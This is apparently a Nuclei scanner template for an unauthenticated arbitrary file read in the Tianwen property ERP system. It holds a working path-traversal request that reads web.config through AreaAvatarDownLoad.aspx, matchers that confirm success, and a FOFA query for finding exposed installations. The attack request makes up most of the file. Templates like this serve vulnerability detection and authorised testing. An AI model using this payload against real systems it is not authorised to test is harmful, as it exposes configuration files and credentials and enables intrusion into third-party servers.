http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <configuration>
            - </configuration>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
          Host: {{Hostname}}
id: tianwenEPR-AreaAvatarDownLoad-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx"
        天问物业ERP系统 AreaAvatarDownLoad.aspx 接口处存在任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，造成信息泄露，导致系统处于极不安全的状态。
    name: 天问物业ERP系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247485268&idx=1&sn=2bc5152edc4b369d67e4412a845ca784&chksm=c267b267f5103b71d8624c760c6dc5d032548c525067a5908350ab895c626e812fae3d3edcf8&token=1439003696&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
